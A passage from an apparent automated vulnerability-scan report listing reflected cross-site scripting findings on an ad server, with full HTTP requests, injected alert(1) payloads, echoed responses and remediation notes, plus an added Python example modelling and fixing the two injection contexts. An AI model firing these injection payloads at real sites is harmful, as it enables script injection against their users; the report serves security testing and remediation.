Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2445525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM4fbb4"><script>alert(1)</script>e91f36c3ebf/1040297436/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.331. http://dm.de.mookie1.com/2/B3DM/2010DM/117382567@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/117382567@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33292"><script>alert(1)</script>790b6dea070 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/117382567@x2333292"><script>alert(1)</script>790b6dea070?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296260799

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2445525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/2089608781/x2333292"><script>alert(1)</script>790b6dea070/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.332. http://dm.de.mookie1.com/2/B3DM/2010DM/117382567@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/117382567@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8204f"-alert(1)-"98ce25bd14a was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
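
The two sinks in findings 4.330 to 4.333 differ only in context: the REST URL segments land inside a double-quoted HTML attribute (the click-tracking HREF), while the raw query string lands inside a double-quoted JavaScript string (`var camp="...";`). The `"-alert(1)-"` payload needs no tag break because the remainder of the line becomes the expression `"...3008204f"-alert(1)-"98ce25bd14a"`, which the JS engine evaluates, calling `alert`. The Python below is an added example, not code from the report or from the ad server: `ANCHOR_TMPL` and `SCRIPT_TMPL` are hypothetical models of the responses shown above, the two payload strings are copied from findings 4.330 and 4.332, and every function name is an assumption. It renders both sinks the vulnerable way and the hardened way, applies Burp's "echoed unmodified" criterion, classifies which context the reflection landed in, and shows the context-specific encoder that closes each sink.

```python
import html
import json

# Added example (not the report's or the ad server's code). The templates are
# constructed models of the responses above: the anchor mirrors the
# <A HREF="..."> that embeds REST URL segments, the script mirrors the inline
# block that assigns the raw query string to `camp`.
ANCHOR_TMPL = ('<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/'
               '{path}/default/empty.gif?x" target="_top"><IMG SRC="x"></A>')
SCRIPT_TMPL = ('<html><head></head><body><script>\n'
               'var camp={camp};\n'
               'camp=camp.toUpperCase();\n'
               '</script></body></html>')

# Payload shapes copied from findings 4.330 and 4.332.
ATTR_PAYLOAD = '4fbb4"><script>alert(1)</script>e91f36c3ebf'
JS_PAYLOAD = '8204f"-alert(1)-"98ce25bd14a'   # "a"-alert(1)-"b" is a JS expression


def render_vulnerable(path_segment, query_string):
    """Raw concatenation, as the report shows: both inputs reach the page unchanged."""
    return (ANCHOR_TMPL.format(path=path_segment),
            SCRIPT_TMPL.format(camp='"' + query_string + '"'))


def attr_encode(value):
    """Encoding for a double-quoted HTML attribute: " -> &quot;, < -> &lt;, & -> &amp;."""
    return html.escape(value, quote=True)


def js_string_literal(value):
    """Emit a complete JS string literal. json.dumps escapes " and backslash;
    the extra replacements stop a literal </script> in the data from closing
    the element, since the HTML tokenizer runs before the JS parser."""
    literal = json.dumps(value)
    return (literal.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def roundtrips(value):
    """A correct JS literal must decode back to the original data."""
    return json.loads(js_string_literal(value)) == value


def render_hardened(path_segment, query_string):
    """Same templates, each input encoded for the context it is written into."""
    return (ANCHOR_TMPL.format(path=attr_encode(path_segment)),
            SCRIPT_TMPL.format(camp=js_string_literal(query_string)))


def reflected_unmodified(body, payload):
    """Burp's 'Confidence: Certain' criterion: the payload appears byte for byte."""
    return payload in body


def reflection_context(body, payload):
    """Classify where an unmodified reflection landed, so the right encoder is chosen."""
    i = body.find(payload)
    if i < 0:
        return None
    before = body[:i]
    if before.rfind("<script") > before.rfind("</script"):
        inside = before[before.rfind("<script"):]
        # An odd number of quotes since the block opened means we are inside a string.
        return "js_string_dq" if inside.count('"') % 2 == 1 else "js_code"
    if before.rfind("<") > before.rfind(">"):
        inside = before[before.rfind("<"):]
        return "attr_dq" if inside.count('"') % 2 == 1 else "tag"
    return "html_text"


def scan(path_segment, query_string, renderer):
    """Push both payloads through a renderer; return {sink: (reflected?, context)}."""
    anchor, script = renderer(path_segment, query_string)
    return {
        "anchor": (reflected_unmodified(anchor, ATTR_PAYLOAD),
                   reflection_context(anchor, ATTR_PAYLOAD)),
        "script": (reflected_unmodified(script, JS_PAYLOAD),
                   reflection_context(script, JS_PAYLOAD)),
    }


if __name__ == "__main__":
    path = "B3DM/2010DM" + ATTR_PAYLOAD
    qs = "USNetwork/RS_SELL_2011Q1_AOL_CPA_300" + JS_PAYLOAD
    print("vulnerable:", scan(path, qs, render_vulnerable))
    print("hardened:  ", scan(path, qs, render_hardened))
```

The classifier exists because the encoder is context-specific: `&quot;` is the right fix inside an attribute but is not decoded inside a `<script>` element, so the JS sink needs a string-literal encoder, and the attribute sink cannot be fixed by JS escaping. Attribute encoding removes the breakout but does not validate the path segment; an ad path that is supposed to be an identifier should additionally be rejected when it contains anything other than the expected character set.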

Request

GET /2/B3DM/2010DM/117382567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_3008204f"-alert(1)-"98ce25bd14a HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296260799

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2483
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_3008204f"-alert(1)-"98ce25bd14a";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to ch
...[SNIP]...

4.333. http://dm.de.mookie1.com/2/B3DM/2010DM/117382567@x23 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/117382567@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dd20"-alert(1)-"8bbf31670d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/117382567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300&1dd20"-alert(1)-"8bbf31670d1=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296260799

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300&1dd20"-alert(1)-"8bbf31670d1=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

4.334. http://dm.de.mookie1.com/2/B3DM/2010DM/11819507567@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11819507567@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38d72"><script>alert(1)</script>d7977f5f4c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM38d72"><script>alert(1)</script>d7977f5f4c4/2010DM/11819507567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263253

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:15 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM38d72"><script>alert(1)</script>d7977f5f4c4/2010DM/421318644/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.335. http://dm.de.mookie1.com/2/B3DM/2010DM/11819507567@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11819507567@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fb8e"><script>alert(1)</script>2506b43238c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM1fb8e"><script>alert(1)</script>2506b43238c/11819507567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263253

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM1fb8e"><script>alert(1)</script>2506b43238c/1494015477/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.336. http://dm.de.mookie1.com/2/B3DM/2010DM/11819507567@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11819507567@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11226"><script>alert(1)</script>50c898679b1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11819507567@x2311226"><script>alert(1)</script>50c898679b1?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263253

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1967467645/x2311226"><script>alert(1)</script>50c898679b1/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.337. http://dm.de.mookie1.com/2/B3DM/2010DM/11819507567@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11819507567@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca1c1"-alert(1)-"203e0c80030 was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/11819507567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728ca1c1"-alert(1)-"203e0c80030 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263253

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2483
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_728ca1c1"-alert(1)-"203e0c80030";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to ch
...[SNIP]...

4.338. http://dm.de.mookie1.com/2/B3DM/2010DM/11819507567@x23 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11819507567@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3078f"-alert(1)-"5f07425cbb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/11819507567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728&3078f"-alert(1)-"5f07425cbb4=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263253

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_728&3078f"-alert(1)-"5f07425cbb4=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

4.339. http://dm.de.mookie1.com/2/B3DM/2010DM/11824141209@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11824141209@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8af4c"><script>alert(1)</script>b80795c01a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM8af4c"><script>alert(1)</script>b80795c01a2/2010DM/11824141209@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM8af4c"><script>alert(1)</script>b80795c01a2/2010DM/745312788/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.340. http://dm.de.mookie1.com/2/B3DM/2010DM/11824141209@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11824141209@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89f1b"><script>alert(1)</script>7b3269718e9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM89f1b"><script>alert(1)</script>7b3269718e9/11824141209@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

